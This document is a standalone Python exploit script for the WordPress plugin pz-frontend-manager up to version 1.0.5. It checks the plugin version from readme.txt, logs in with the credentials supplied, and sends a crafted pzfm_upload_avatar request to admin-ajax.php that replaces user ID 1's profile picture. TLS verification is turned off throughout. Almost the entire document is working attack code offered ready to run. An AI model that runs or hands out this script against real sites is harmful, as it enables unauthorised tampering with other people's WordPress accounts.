import argparse
import requests
import base64
import os
import re
import json

#by Nxploit | Khaled_alenazi

requests.packages.urllib3.disable_warnings()

def check_version(url):
    check_url = f"{url}/wp-content/plugins/pz-frontend-manager/readme.txt"
    response = requests.get(check_url, verify=False)
    if response.status_code == 200:
        match = re.search(r"Stable tag:\s*([0-9.]+)", response.text)
        if match:
            version = match.group(1)
            if version <= '1.0.5':
                print(f"The site is vulnerable! Detected version: {version}")
                return True
            else:
                print(f"The site is not vulnerable. Detected version: {version}")
                return False
    print("Failed to determine the plugin version.")
    return False

def encode_image(image_path):
    if not os.path.exists(image_path):
        print(f"Error: Image file '{image_path}' not found!")
        exit()
    
    with open(image_path, "rb") as image_file:
        encoded_string = base64.b64encode(image_file.read()).decode("utf-8")
    return f"data:image/png;base64,{encoded_string}"

def perform_exploit(url, username, password, image_data):
    user_agent = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0) Gecko/20100101 Firefox/124.0"
    session = requests.Session()

    login_url = f"{url}/wp-login.php"
    response = session.post(login_url, verify=False, data={
        'log': username,
        'pwd': password,
        'rememberme': 'forever',
        'wp-submit': 'Log+In'
    }, headers={"User-Agent": user_agent})

    if any('wordpress_logged_in' in cookie.name for cookie in session.cookies):
        print("Logged in successfully.")
    else:
        print("Failed to log in.")
        exit()

    print("Base64 Encoded Image Data:")
    print(image_data[:100] + "...")

    post_url = f"{url}/wp-admin/admin-ajax.php"
    headers = {
        "User-Agent": user_agent,
        "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
        "X-Requested-With": "XMLHttpRequest",
        "Origin": url,
        "Cookie": "; ".join([f"{cookie.name}={cookie.value}" for cookie in session.cookies]),
        "Connection": "close"
    }
    data = {
        'action': 'pzfm_upload_avatar',
        'imageData': image_data,
        'userID': 1
    }
    response = session.post(post_url, headers=headers, data=data)
    
    print("Request result:", response.text)
    
    try:
        response_json = json.loads(response.text)
        if 'url' in response_json:
            image_url = response_json['url']
            print(f"Image URL: {image_url}")
        else:
            print("No URL found in the response.")
    except json.JSONDecodeError:
        print("Failed to decode JSON response.")

if __name__ == "__main__":
    parser = argparse.ArgumentParser(description='pz-frontend-manager <= 1.0.5 - CSRF change user profile picture')
    parser.add_argument('--url', '-u', type=str, required=True, help='Base URL of the WordPress site')
    parser.add_argument('--username', '-U', type=str, required=True, help='Username for login')
    parser.add_argument('--password', '-p', type=str, required=True, help='Password for login')
    parser.add_argument('--image', '-i', type=str, default='Nxploit.jpg', help='Image file name (default: Nxploit.jpg)')
    args = parser.parse_args()

    script_dir = os.path.dirname(os.path.abspath(__file__))
    image_path = os.path.join(script_dir, args.image)

    if check_version(args.url):
        image_data = encode_image(image_path)
        perform_exploit(args.url, args.username, args.password, image_data)